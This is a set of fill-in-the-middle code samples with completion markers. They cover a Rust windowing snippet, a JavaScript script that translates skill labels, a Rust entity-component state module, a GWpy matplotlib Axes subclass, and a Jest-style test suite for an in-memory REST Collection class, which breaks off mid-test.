//Draw a hole in the window replacing alpha channel (Only in Orbital, not in SDL2)
window.rect(300, 100, 80, 80, Color::rgba(10, 10, 10, 1));
//Draw a transparent rectangle over window content
window.mode().set(Mode::Blend); //set mode to Blend fron now on
window.rect(200, 230, 80, 80, Color::rgba(100, 100, 100, 100));
//Draw a blured box over window content
window.box_blur(170, 100, 150, 150, 10);
//Draw a shadow around a box
window.box_shadow(170, 100, 150, 150, 0, 0, 20, Color::rgba(0, 0, 0, 255));
window.sync();
'events: loop {
for event in window.events() {
match event.to_option() {
EventOption::Quit(_quit_event) => break 'events,
EventOption::Mouse(evt) => println!(
"At position {:?} pixel color is : {:?}",
(evt.x, evt.y),
window.getpixel(evt.x, evt.y)
),
event_option => println!("{:?}", event_option),
}
}
}
}<|fim▁end|>
| |
<|file_name|>translate_armor_search.js<|end_file_name|><|fim▁begin|>var tag, tag_text;
var name, name_jp;
var labeltags = document.getElementsByTagName("label");
for (var i = 0; i < labeltags.length; i++) {
tag = labeltags[i];
tag_text = tag.innerText;
for (var j=0; j<skill_replace_list.length; j++) {
name = skill_replace_list[j]["name"];
name_jp = skill_replace_list[j]["name_jp"];
// replace on exact match only
if (tag_text == name_jp) {
tag.innerText = name;
tag.setAttribute("title", name_jp);
matched = true;
break;<|fim▁hole|><|fim▁end|>
|
}
}
}
|
<|file_name|>mod.rs<|end_file_name|><|fim▁begin|>mod builder;
pub mod update_queue;
pub use self::builder::StateBuilder;
pub use self::update_queue::Monitors as UpdateMonitors;
use ecs::entity::{Entities, Entity, EntityRef, Accessor};
use ecs::module::{Component, StorageReadGuard, StorageWriteGuard};
use ecs::module::{Module, Modules, HasComponent};
use ecs::spawn::{SpawnRequest, Prototype};
use ecs::group::Groups;
use self::update_queue::{UpdateQueues, UpdateQueue, UpdateQueueReader};
use rayon;
pub struct State<Cx: Send> {
entities: Entities,
modules: Modules<Cx>,
groups: Groups,
update_queues: UpdateQueues,
}
impl<Cx: Send> State<Cx> {
pub fn new(modules: Modules<Cx>,
groups: Groups,
update_queues: UpdateQueues)
-> Self {
State {
entities: Entities::new(),
modules: modules,
groups: groups,
update_queues: update_queues,
}
}
pub fn entity_ref<'a>(&self, accessor: Accessor<'a>) -> EntityRef {
self.entities.entity_ref(accessor)
}
pub fn accessor(&self, entity_ref: EntityRef) -> Option<Accessor> {
self.entities.upgrade(entity_ref)
}
fn spawn_later(&self) -> Entity {
let entity = self.entities.create();
self.entities.spawn_later(entity);
entity
}
fn attach_later<'a, C: Component>(&self, accessor: Accessor<'a>, component: C::Template) {
self.update_queue::<C>().attach(accessor, component);
}
fn detach_later<'a, C: Component>(&self, accessor: Accessor<'a>) {
self.update_queue::<C>().detach(accessor);
}
fn update_queue<C: Component>(&self) -> &UpdateQueue<C> {
self.update_queues
.get::<C>()
.expect("the component has not been registered")
}
fn remove_later<'a>(&self, entity: Accessor<'a>) {
self.entities.remove_later(entity);
}
pub fn read<C: Component>(&self) -> StorageReadGuard<<C::Module as HasComponent<C>>::Storage>
where C::Module: Module<Cx>
{
self.module::<C::Module>().read()
}
pub fn write<C: Component>(&self) -> StorageWriteGuard<<C::Module as HasComponent<C>>::Storage>
where C::Module: Module<Cx>
{
self.module::<C::Module>().write()
}
pub fn module<M: Module<Cx>>(&self) -> &M {
self.modules
.get::<M>()
.expect("the requested module doesn't exists")
}
<|fim▁hole|>
fn commit(&mut self, cx: &mut Cx) {
let world_removes = self.entities.push_removes();
let &mut State { ref mut update_queues,
ref mut groups,
ref mut entities,
ref mut modules,
.. } = self;
{
entities.commit();
let commit_args = CommitArgs {
entities: &*entities,
update_queues: update_queues,
world_removes: &world_removes,
};
modules.commit(&commit_args, cx);
}
groups.commit(&update_queues.monitors());
update_queues.clear_flags();
}
}
pub struct Update<'a, Cx: Send + 'a> {
state: &'a mut State<Cx>,
}
impl<'a, Cx: Send + 'a> Update<'a, Cx> {
pub fn commit<F>(&mut self, context: &mut Cx, f: F)
where F: FnOnce(&State<Cx>, Commit<Cx>, &mut Cx)
{
{
let state = &*self.state;
f(state, Commit { state: state }, context);
}
self.state.commit(context);
}
}
pub struct Commit<'a, Cx: Send + 'a> {
state: &'a State<Cx>,
}
impl<'a, Cx: Send + 'a> Commit<'a, Cx> {
#[inline]
pub fn spawn_later(self) -> SpawnRequest<'a, Cx> {
let entity = self.state.spawn_later();
SpawnRequest::new(entity, self)
}
#[inline]
pub fn spawn_later_with<P: Prototype>(self, prototype: P) {
let request = self.spawn_later();
prototype.spawn_later_with(request);
}
#[inline]
pub fn update_queue<C: Component>(self) -> &'a UpdateQueue<C> {
self.state.update_queue::<C>()
}
#[inline]
pub fn remove_later(self, entity: Accessor) {
self.state.remove_later(entity)
}
#[inline]
pub fn attach_later<C: Component>(self, entity: Accessor, component: C::Template) {
self.state.attach_later::<C>(entity, component);
}
#[inline]
pub fn detach_later<C: Component>(self, entity: Accessor) {
self.state.detach_later::<C>(entity);
}
}
impl<'a, Cx: Send + 'a> Clone for Commit<'a, Cx> {
#[inline]
fn clone(&self) -> Self {
Commit { state: self.state }
}
}
impl<'a, Cx: Send + 'a> Copy for Commit<'a, Cx> {}
pub struct CommitArgs<'a> {
pub entities: &'a Entities,
update_queues: &'a UpdateQueues,
world_removes: &'a [Entity],
}
impl<'a> CommitArgs<'a> {
pub fn update_reader_for<C: Component>(&self) -> UpdateQueueReader<C> {
self.update_queues
.get::<C>()
.expect("the component has not been registered")
.process(self.world_removes)
}
pub fn world_removes(&self) -> &[Entity] {
&self.world_removes
}
}<|fim▁end|>
|
pub fn update(&mut self) -> Update<Cx> {
Update { state: self }
}
|
<|file_name|>axes.py<|end_file_name|><|fim▁begin|># -*- coding: utf-8 -*-
# Copyright (C) Duncan Macleod (2013)
#
# This file is part of GWpy.
#
# GWpy is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# GWpy is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GWpy. If not, see <http://www.gnu.org/licenses/>.
"""Extension of the :class:`~matplotlib.axes.Axes` class with
user-friendly attributes
"""
from six import string_types
from matplotlib.axes import Axes as _Axes
from matplotlib.artist import Artist
from matplotlib.projections import register_projection
from .decorators import auto_refresh
from . import (rcParams, tex, html)
__author__ = 'Duncan Macleod <duncan.macleod@ligo.org>'
class Axes(_Axes):
"""An extension of the core matplotlib :class:`~matplotlib.axes.Axes`.
These custom `Axes` provide only some simpler attribute accessors.
Notes
-----
A new set of `Axes` should be constructed via::
<|fim▁hole|>
where plot is a :class:`~gwpy.plotter.Plot` figure, and ``'xxx'``
is the name of the `Axes` you want to add.
"""
projection = 'rectilinear'
def __init__(self, *args, **kwargs):
super(Axes, self).__init__(*args, **kwargs)
self.xaxis.labelpad = 10
__init__.__doc__ = _Axes.__init__.__doc__
# -----------------------------------------------
# text properties
# x-axis label
@property
def xlabel(self):
"""Label for the x-axis
:type: :class:`~matplotlib.text.Text`
"""
return self.xaxis.label
@xlabel.setter
@auto_refresh
def xlabel(self, text):
if isinstance(text, string_types):
self.set_xlabel(text)
else:
self.xaxis.label = text
@xlabel.deleter
@auto_refresh
def xlabel(self):
self.set_xlabel("")
# y-axis label
@property
def ylabel(self):
"""Label for the y-axis
:type: :class:`~matplotlib.text.Text`
"""
return self.yaxis.label
@ylabel.setter
@auto_refresh
def ylabel(self, text):
if isinstance(text, string_types):
self.set_ylabel(text)
else:
self.yaxis.label = text
@ylabel.deleter
@auto_refresh
def ylabel(self):
self.set_ylabel("")
# -----------------------------------------------
# limit properties
@property
def xlim(self):
"""Limits for the x-axis
:type: `tuple`
"""
return self.get_xlim()
@xlim.setter
@auto_refresh
def xlim(self, limits):
self.set_xlim(*limits)
@xlim.deleter
@auto_refresh
def xlim(self):
self.relim()
self.autoscale_view(scalex=True, scaley=False)
@property
def ylim(self):
"""Limits for the y-axis
:type: `tuple`
"""
return self.get_ylim()
@ylim.setter
@auto_refresh
def ylim(self, limits):
self.set_ylim(*limits)
@ylim.deleter
def ylim(self):
self.relim()
self.autoscale_view(scalex=False, scaley=True)
# -----------------------------------------------
# scale properties
@property
def logx(self):
"""Display the x-axis with a logarithmic scale
:type: `bool`
"""
return self.get_xscale() == "log"
@logx.setter
@auto_refresh
def logx(self, log):
if log and not self.logx:
self.set_xscale('log')
elif self.logx and not log:
self.set_xscale('linear')
@property
def logy(self):
"""Display the y-axis with a logarithmic scale
:type: `bool`
"""
return self.get_yscale() == "log"
@logy.setter
@auto_refresh
def logy(self, log):
if log and not self.logy:
self.set_yscale('log')
elif self.logy and not log:
self.set_yscale('linear')
# -------------------------------------------
# Axes methods
@auto_refresh
def resize(self, pos, which='both'):
"""Set the axes position with::
pos = [left, bottom, width, height]
in relative 0,1 coords, or *pos* can be a
:class:`~matplotlib.transforms.Bbox`
There are two position variables: one which is ultimately
used, but which may be modified by :meth:`apply_aspect`, and a
second which is the starting point for :meth:`apply_aspect`.
"""
return super(Axes, self).set_position(pos, which=which)
@auto_refresh
def add_label_unit(self, unit, axis='x'):
label = getattr(self, 'get_%slabel' % axis)()
if not label:
label = unit.__doc__
if rcParams.get("text.usetex", False):
unitstr = tex.unit_to_latex(unit)
else:
unitstr = unit.to_string()
set_ = getattr(self, 'set_%slabel' % axis)
if label:
set_("%s [%s]" % (label, unitstr))
else:
set_(unitstr)
def legend(self, *args, **kwargs):
# set kwargs
alpha = kwargs.pop("alpha", 0.8)
linewidth = kwargs.pop("linewidth", 8)
# make legend
legend = super(Axes, self).legend(*args, **kwargs)
# find relevant axes
if legend is not None:
lframe = legend.get_frame()
lframe.set_alpha(alpha)
[l.set_linewidth(linewidth) for l in legend.get_lines()]
return legend
legend.__doc__ = _Axes.legend.__doc__
def html_map(self, imagefile, data=None, **kwargs):
"""Create an HTML map for some data contained in these `Axes`
Parameters
----------
data : `~matplotlib.artist.Artist`, `~gwpy.types.Series`, `array-like`
data to map, one of an `Artist` already drawn on these axes (
via :meth:`plot` or :meth:`scatter`, for example) or a data set
imagefile : `str`
path to image file on disk for the containing `Figure`
mapname : `str`, optional
ID to connect <img> tag and <map> tags, default: ``'points'``. This
should be unique if multiple maps are to be written to a single
HTML file.
shape : `str`, optional
shape for <area> tag, default: ``'circle'``
standalone : `bool`, optional
wrap map HTML with required HTML5 header and footer tags,
default: `True`
title : `str`, optional
title name for standalone HTML page
jquery : `str`, optional
URL of jquery script, defaults to googleapis.com URL
Returns
-------
HTML : `str`
string of HTML markup that defines the <img> and <map>
"""
if data is None:
artists = self.lines + self.collections + self.images
if len(artists) != 1:
raise ValueError("Cannot determine artist to map, %d found."
% len(artists))
data = artists[0]
if isinstance(data, Artist):
return html.map_artist(data, imagefile, **kwargs)
else:
return html.map_data(data, self, imagefile, **kwargs)
register_projection(Axes)<|fim▁end|>
|
>>> plot.add_subplots(111, projection='xxx')
|
<|file_name|>Collection.spec.js<|end_file_name|><|fim▁begin|>import expect from "expect";
import { Collection } from "./Collection";
import { Server } from "./Server";
describe("Collection", () => {
describe("constructor", () => {
it("should set the initial set of data", () => {
const collection = new Collection([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
expect(collection.getAll()).toEqual([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
});
it("should set identifier name to id by default", () => {
const collection = new Collection();
expect(collection.identifierName).toEqual("id");
});
});
describe("getCount", () => {
it("should return an integer", () => {
expect(new Collection().getCount()).toEqual(0);
});
it("should return the collection size", () => {
expect(new Collection([{}, {}]).getCount()).toEqual(2);
});
it("should return the correct collection size, even when items were removed", () => {
const collection = new Collection([{}, {}, {}]);
collection.removeOne(1);
expect(collection.getCount()).toEqual(2);<|fim▁hole|> function filter(item) {
return item.name == "a" || item.name == "b";
}
expect(collection.getCount({ filter: filter })).toEqual(2);
});
});
describe("getAll", () => {
it("should return an array", () => {
expect(new Collection().getAll()).toEqual([]);
});
it("should return all collections", () => {
const collection = new Collection([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
expect(collection.getAll()).toEqual([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
});
describe("sort query", () => {
it("should throw an error if passed an unsupported sort argument", () => {
const collection = new Collection();
expect(() => {
collection.getAll({ sort: 23 });
}).toThrow(new Error("Unsupported sort type"));
});
it("should sort by sort function", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [
{ name: "a", id: 1 },
{ name: "b", id: 2 },
{ name: "c", id: 0 },
];
function sort(a, b) {
if (a.name > b.name) {
return 1;
}
if (a.name < b.name) {
return -1;
}
// a must be equal to b
return 0;
}
expect(collection.getAll({ sort: sort })).toEqual(expected);
});
it("should sort by sort name", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [
{ name: "a", id: 1 },
{ name: "b", id: 2 },
{ name: "c", id: 0 },
];
expect(collection.getAll({ sort: "name" })).toEqual(expected);
});
it("should sort by sort name and direction", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
let expected;
expected = [
{ name: "a", id: 1 },
{ name: "b", id: 2 },
{ name: "c", id: 0 },
];
expect(collection.getAll({ sort: ["name", "asc"] })).toEqual(expected);
expected = [
{ name: "c", id: 0 },
{ name: "b", id: 2 },
{ name: "a", id: 1 },
];
expect(collection.getAll({ sort: ["name", "desc"] })).toEqual(expected);
});
it("should not affect further requests", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
collection.getAll({ sort: "name" });
const expected = [
{ name: "c", id: 0 },
{ name: "a", id: 1 },
{ name: "b", id: 2 },
];
expect(collection.getAll()).toEqual(expected);
});
});
describe("filter query", () => {
it("should throw an error if passed an unsupported filter argument", () => {
const collection = new Collection();
expect(() => {
collection.getAll({ filter: 23 });
}).toThrow(new Error("Unsupported filter type"));
});
it("should filter by filter function", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [
{ name: "c", id: 0 },
{ name: "b", id: 2 },
];
function filter(item) {
return item.name !== "a";
}
expect(collection.getAll({ filter: filter })).toEqual(expected);
});
it("should filter by filter object", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
const expected = [{ name: "b", id: 2 }];
expect(collection.getAll({ filter: { name: "b" } })).toEqual(expected);
});
it("should filter values with deep paths", () => {
const collection = new Collection([
{ name: "c", deep: { value: "c" } },
{ name: "a", deep: { value: "a" } },
{ name: "b", deep: { value: "b" } },
]);
const expected = [{ name: "b", deep: { value: "b" }, id: 2 }];
expect(collection.getAll({ filter: { "deep.value": "b" } })).toEqual(expected);
});
it("should filter values with objects", () => {
const collection = new Collection([
{ name: "c", deep: { value: "c" } },
{ name: "a", deep: { value: "a" } },
{ name: "b", deep: { value: "b" } },
]);
const expected = [{ name: "b", deep: { value: "b" }, id: 2 }];
expect(collection.getAll({ filter: { deep: { value: "b" } } })).toEqual(expected);
});
it("should filter boolean values properly", () => {
const collection = new Collection([
{ name: "a", is: true },
{ name: "b", is: false },
{ name: "c", is: true },
]);
const expectedFalse = [{ name: "b", id: 1, is: false }];
const expectedTrue = [
{ name: "a", id: 0, is: true },
{ name: "c", id: 2, is: true },
];
expect(collection.getAll({ filter: { is: "false" } })).toEqual(
expectedFalse
);
expect(collection.getAll({ filter: { is: false } })).toEqual(
expectedFalse
);
expect(collection.getAll({ filter: { is: "true" } })).toEqual(
expectedTrue
);
expect(collection.getAll({ filter: { is: true } })).toEqual(
expectedTrue
);
});
it("should filter array values properly", () => {
const collection = new Collection([
{ tags: ["a", "b", "c"] },
{ tags: ["b", "c", "d"] },
{ tags: ["c", "d", "e"] },
]);
const expected = [
{ id: 0, tags: ["a", "b", "c"] },
{ id: 1, tags: ["b", "c", "d"] },
];
expect(collection.getAll({ filter: { tags: "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { tags: "f" } })).toEqual([]);
});
it("should filter array values properly within deep paths", () => {
const collection = new Collection([
{ deep: { tags: ["a", "b", "c"] } },
{ deep: { tags: ["b", "c", "d"] } },
{ deep: { tags: ["c", "d", "e"] } },
]);
const expected = [
{ id: 0, deep: { tags: ["a", "b", "c"] } },
{ id: 1, deep: { tags: ["b", "c", "d"] } },
];
expect(collection.getAll({ filter: { 'deep.tags': "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { 'deep.tags': "f" } })).toEqual([]);
});
it("should filter array values properly inside deep paths", () => {
const collection = new Collection([
{ tags: { deep: ["a", "b", "c"] } },
{ tags: { deep: ["b", "c", "d"] } },
{ tags: { deep: ["c", "d", "e"] } },
]);
const expected = [
{ id: 0, tags: { deep: ["a", "b", "c"] } },
{ id: 1, tags: { deep: ["b", "c", "d"] } },
];
expect(collection.getAll({ filter: { 'tags.deep': "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { 'tags.deep': "f" } })).toEqual([]);
});
it("should filter array values properly with deep paths", () => {
const collection = new Collection([
{ tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ tags: [{ name: "b" }, { name: "c" }, { name: "d" }] },
{ tags: [{ name: "c" }, { name: "d" }, { name: "e" }] },
]);
const expected = [
{ id: 0, tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ id: 1, tags: [{ name: "b" }, { name: "c" }, { name: "d" }] },
];
expect(collection.getAll({ filter: { 'tags.name': "b" } })).toEqual(expected);
expect(collection.getAll({ filter: { 'tags.name': "f" } })).toEqual([]);
});
it("should filter array values properly when receiving several values within deep paths", () => {
const collection = new Collection([
{ deep: { tags: ["a", "b", "c"] } },
{ deep: { tags: ["b", "c", "d"] } },
{ deep: { tags: ["c", "d", "e"] } },
]);
const expected = [{ id: 1, deep: { tags: ["b", "c", "d"] } }];
expect(collection.getAll({ filter: { 'deep.tags': ["b", "d"] } })).toEqual(
expected
);
expect(
collection.getAll({ filter: { 'deep.tags': ["a", "b", "e"] } })
).toEqual([]);
});
it("should filter array values properly when receiving several values with deep paths", () => {
const collection = new Collection([
{ tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ tags: [{ name: "c" }, { name: "d" }, { name: "e" }] },
{ tags: [{ name: "e" }, { name: "f" }, { name: "g" }] },
]);
const expected = [
{ id: 0, tags: [{ name: "a" }, { name: "b" }, { name: "c" }] },
{ id: 1, tags: [{ name: "c" }, { name: "d" }, { name: "e" }] }
];
expect(collection.getAll({ filter: { 'tags.name': ["c"] } })).toEqual(
expected
);
expect(
collection.getAll({ filter: { 'tags.name': ["h", "i"] } })
).toEqual([]);
});
it("should filter array values properly when receiving several values", () => {
const collection = new Collection([
{ tags: ["a", "b", "c"] },
{ tags: ["b", "c", "d"] },
{ tags: ["c", "d", "e"] },
]);
const expected = [{ id: 1, tags: ["b", "c", "d"] }];
expect(collection.getAll({ filter: { tags: ["b", "d"] } })).toEqual(
expected
);
expect(
collection.getAll({ filter: { tags: ["a", "b", "e"] } })
).toEqual([]);
});
it("should filter by the special q full-text filter", () => {
const collection = new Collection([
{ a: "Hello", b: "world" },
{ a: "helloworld", b: "bunny" },
{ a: "foo", b: "bar" },
{ a: { b: "bar" } },
{ a: "", b: "" },
{ a: null, b: null },
{},
]);
expect(collection.getAll({ filter: { q: "hello" } })).toEqual([
{ id: 0, a: "Hello", b: "world" },
{ id: 1, a: "helloworld", b: "bunny" },
]);
expect(collection.getAll({ filter: { q: "bar" } })).toEqual([
{ id: 2, a: "foo", b: "bar" },
{ id: 3, a: { b: "bar" } },
]);
});
it("should filter by range using _gte, _gt, _lte, and _lt", () => {
const collection = new Collection([{ v: 1 }, { v: 2 }, { v: 3 }]);
expect(collection.getAll({ filter: { v_gte: 2 } })).toEqual([
{ v: 2, id: 1 },
{ v: 3, id: 2 },
]);
expect(collection.getAll({ filter: { v_gt: 2 } })).toEqual([
{ v: 3, id: 2 },
]);
expect(collection.getAll({ filter: { v_gte: 4 } })).toEqual([]);
expect(collection.getAll({ filter: { v_lte: 2 } })).toEqual([
{ v: 1, id: 0 },
{ v: 2, id: 1 },
]);
expect(collection.getAll({ filter: { v_lt: 2 } })).toEqual([
{ v: 1, id: 0 },
]);
expect(collection.getAll({ filter: { v_lte: 0 } })).toEqual([]);
});
it("should filter by inequality using _neq", () => {
const collection = new Collection([{ v: 1 }, { v: 2 }, { v: 3 }]);
expect(collection.getAll({ filter: { v_neq: 2 } })).toEqual([
{ v: 1, id: 0 },
{ v: 3, id: 2 },
]);
});
it("should filter by text search using _q", () => {
const collection = new Collection([{ v: 'abCd' }, { v: 'cDef' }, { v: 'EFgh' }]);
expect(collection.getAll({ filter: { v_q: 'cd' } })).toEqual([
{ id: 0, v: 'abCd' }, { id: 1, v: 'cDef' }
]);
expect(collection.getAll({ filter: { v_q: 'ef' } })).toEqual([
{ id: 1, v: 'cDef' }, { id: 2, v: 'EFgh' }
]);
});
it("should filter by array", () => {
const collection = new Collection([
{ a: "H" },
{ a: "e" },
{ a: "l" },
{ a: "l" },
{ a: "o" },
]);
expect(collection.getAll({ filter: { id: [] } })).toEqual([]);
expect(collection.getAll({ filter: { id: [1, 2, 3] } })).toEqual([
{ id: 1, a: "e" },
{ id: 2, a: "l" },
{ id: 3, a: "l" },
]);
expect(collection.getAll({ filter: { id: ["1", "2", "3"] } })).toEqual([
{ id: 1, a: "e" },
{ id: 2, a: "l" },
{ id: 3, a: "l" },
]);
});
it("should combine all filters with an AND logic", () => {
const collection = new Collection([{ v: 1 }, { v: 2 }, { v: 3 }]);
expect(collection.getAll({ filter: { v_gte: 2, v_lte: 2 } })).toEqual([
{ v: 2, id: 1 },
]);
});
it("should not affect further requests", () => {
const collection = new Collection([
{ name: "c" },
{ name: "a" },
{ name: "b" },
]);
function filter(item) {
return item.name !== "a";
}
collection.getAll({ filter: filter });
const expected = [
{ name: "c", id: 0 },
{ name: "a", id: 1 },
{ name: "b", id: 2 },
];
expect(collection.getAll()).toEqual(expected);
});
});
describe("range query", () => {
it("should throw an error if passed an unsupported range argument", () => {
const collection = new Collection();
expect(() => {
collection.getAll({ range: 23 });
}).toThrow(new Error("Unsupported range type"));
});
const collection = new Collection([
{ id: 0, name: "a" },
{ id: 1, name: "b" },
{ id: 2, name: "c" },
{ id: 3, name: "d" },
{ id: 4, name: "e" },
]);
it("should return a range in the collection", () => {
let expected;
expected = [{ id: 0, name: "a" }];
expect(collection.getAll({ range: [0, 0] })).toEqual(expected);
expected = [
{ id: 1, name: "b" },
{ id: 2, name: "c" },
{ id: 3, name: "d" },
{ id: 4, name: "e" },
];
expect(collection.getAll({ range: [1] })).toEqual(expected);
expected = [
{ id: 2, name: "c" },
{ id: 3, name: "d" },
];
expect(collection.getAll({ range: [2, 3] })).toEqual(expected);
});
it("should not affect further requests", () => {
const collection = new Collection([
{ id: 0, name: "a" },
{ id: 1, name: "b" },
{ id: 2, name: "c" },
]);
collection.getAll({ range: [1] });
const expected = [
{ id: 0, name: "a" },
{ id: 1, name: "b" },
{ id: 2, name: "c" },
];
expect(collection.getAll()).toEqual(expected);
});
});
describe("embed query", () => {
it("should throw an error when trying to embed a non-existing collection", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const server = new Server();
server.addCollection("foos", foos);
expect(() => {
foos.getAll({ embed: ["bar"] });
}).toThrow(new Error("Can't embed a non-existing collection bar"));
});
it("should return the original object for missing embed one", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const bars = new Collection([]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [{ id: 0, name: "John", bar_id: 123 }];
expect(foos.getAll({ embed: ["bar"] })).toEqual(expected);
});
it("should return the object with the reference object for embed one", () => {
const foos = new Collection([
{ name: "John", bar_id: 123 },
{ name: "Jane", bar_id: 456 },
]);
const bars = new Collection([
{ id: 1, bar: "nobody wants me" },
{ id: 123, bar: "baz" },
{ id: 456, bar: "bazz" },
]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [
{ id: 0, name: "John", bar_id: 123, bar: { id: 123, bar: "baz" } },
{ id: 1, name: "Jane", bar_id: 456, bar: { id: 456, bar: "bazz" } },
];
expect(foos.getAll({ embed: ["bar"] })).toEqual(expected);
});
it("should throw an error when trying to embed many a non-existing collection", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const server = new Server();
server.addCollection("foos", foos);
expect(() => {
foos.getAll({ embed: ["bars"] });
}).toThrow(new Error("Can't embed a non-existing collection bars"));
});
it("should return the object with an empty array for missing embed many", () => {
const foos = new Collection([{ name: "John", bar_id: 123 }]);
const bars = new Collection([{ id: 1, bar: "nobody wants me" }]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [{ id: 1, bar: "nobody wants me", foos: [] }];
expect(bars.getAll({ embed: ["foos"] })).toEqual(expected);
});
it("should return the object with an array of references for embed many", () => {
const foos = new Collection([
{ id: 1, name: "John", bar_id: 123 },
{ id: 2, name: "Jane", bar_id: 456 },
{ id: 3, name: "Jules", bar_id: 456 },
]);
const bars = new Collection([
{ id: 1, bar: "nobody wants me" },
{ id: 123, bar: "baz" },
{ id: 456, bar: "bazz" },
]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [
{ id: 1, bar: "nobody wants me", foos: [] },
{ id: 123, bar: "baz", foos: [{ id: 1, name: "John", bar_id: 123 }] },
{
id: 456,
bar: "bazz",
foos: [
{ id: 2, name: "Jane", bar_id: 456 },
{ id: 3, name: "Jules", bar_id: 456 },
],
},
];
expect(bars.getAll({ embed: ["foos"] })).toEqual(expected);
});
it("should return the object with an array of references for embed many using inner array", () => {
const foos = new Collection([
{ id: 1, name: "John" },
{ id: 2, name: "Jane" },
{ id: 3, name: "Jules" },
]);
const bars = new Collection([
{ id: 1, bar: "nobody wants me" },
{ id: 123, bar: "baz", foos: [1] },
{ id: 456, bar: "bazz", foos: [2, 3] },
]);
const server = new Server();
server.addCollection("foos", foos);
server.addCollection("bars", bars);
const expected = [
{ id: 1, bar: "nobody wants me", foos: [] },
{ id: 123, bar: "baz", foos: [{ id: 1, name: "John" }] },
{
id: 456,
bar: "bazz",
foos: [
{ id: 2, name: "Jane" },
{ id: 3, name: "Jules" },
],
},
];
expect(bars.getAll({ embed: ["foos"] })).toEqual(expected);
});
it("should allow multiple embeds", () => {
const books = new Collection([
{ id: 1, title: "Pride and Prejudice", author_id: 1 },
{ id: 2, title: "Sense and Sensibility", author_id: 1 },
{ id: 3, title: "War and Preace", author_id: 2 },
]);
const authors = new Collection([
{ id: 1, firstName: "Jane", lastName: "Austen", country_id: 1 },
{ id: 2, firstName: "Leo", lastName: "Tosltoi", country_id: 2 },
]);
const countries = new Collection([
{ id: 1, name: "England" },
{ id: 2, name: "Russia" },
]);
const server = new Server();
server.addCollection("books", books);
server.addCollection("authors", authors);
server.addCollection("countrys", countries); // nevermind the plural
const expected = [
{
id: 1,
firstName: "Jane",
lastName: "Austen",
country_id: 1,
books: [
{ id: 1, title: "Pride and Prejudice", author_id: 1 },
{ id: 2, title: "Sense and Sensibility", author_id: 1 },
],
country: { id: 1, name: "England" },
},
{
id: 2,
firstName: "Leo",
lastName: "Tosltoi",
country_id: 2,
books: [{ id: 3, title: "War and Preace", author_id: 2 }],
country: { id: 2, name: "Russia" },
},
];
expect(authors.getAll({ embed: ["books", "country"] })).toEqual(
expected
);
});
});
describe("composite query", () => {
it("should execute all commands of the query object", () => {
const collection = new Collection([
{ id: 0, name: "c", arg: false },
{ id: 1, name: "b", arg: true },
{ id: 2, name: "a", arg: true },
]);
const query = {
filter: { arg: true },
sort: "name",
};
const expected = [
{ id: 2, name: "a", arg: true },
{ id: 1, name: "b", arg: true },
];
expect(collection.getAll(query)).toEqual(expected);
});
});
});
describe("getOne", () => {
it("should throw an exception when trying to get a non-existing item", () => {
const collection = new Collection();
expect(() => {
collection.getOne(0);
}).toThrow(new Error("No item with identifier 0"));
});
it("should return the first collection matching the identifier", () => {
const collection = new Collection([
{ id: 1, name: "foo" },
{ id: 2, name: "bar" },
]);
expect(collection.getOne(1)).toEqual({ id: 1, name: "foo" });
expect(collection.getOne(2)).toEqual({ id: 2, name: "bar" });
});
it("should use the identifierName", () => {
const collection = new Collection(
[
{ _id: 1, name: "foo" },
{ _id: 2, name: "bar" },
],
"_id"
);
expect(collection.getOne(1)).toEqual({ _id: 1, name: "foo" });
expect(collection.getOne(2)).toEqual({ _id: 2, name: "bar" });
});
});
describe("addOne", () => {
it("should return the item inserted", () => {
const collection = new Collection();
const r = collection.addOne({ name: "foo" });
expect(r.name).toEqual("foo");
});
it("should add the item", () => {
const collection = new Collection();
collection.addOne({ name: "foo" });
expect(collection.getOne(0)).toEqual({ id: 0, name: "foo" });
});
it("should incement the sequence at each insertion", () => {
const collection = new Collection();
expect(collection.sequence).toEqual(0);
collection.addOne({ name: "foo" });
expect(collection.sequence).toEqual(1);
collection.addOne({ name: "foo" });
expect(collection.sequence).toEqual(2);
});
it("should set identifier if not provided", () => {
const collection = new Collection();
const r1 = collection.addOne({ name: "foo" });
expect(r1.id).toEqual(0);
const r2 = collection.addOne({ name: "bar" });
expect(r2.id).toEqual(1);
});
it("should refuse insertion with existing identifier", () => {
const collection = new Collection([{ name: "foo" }]);
expect(() => {
collection.addOne({ id: 0, name: "bar" });
}).toThrow(new Error("An item with the identifier 0 already exists"));
});
it("should accept insertion with non-existing identifier and move sequence accordingly", () => {
const collection = new Collection();
collection.addOne({ name: "foo" });
collection.addOne({ id: 12, name: "bar" });
expect(collection.sequence).toEqual(13);
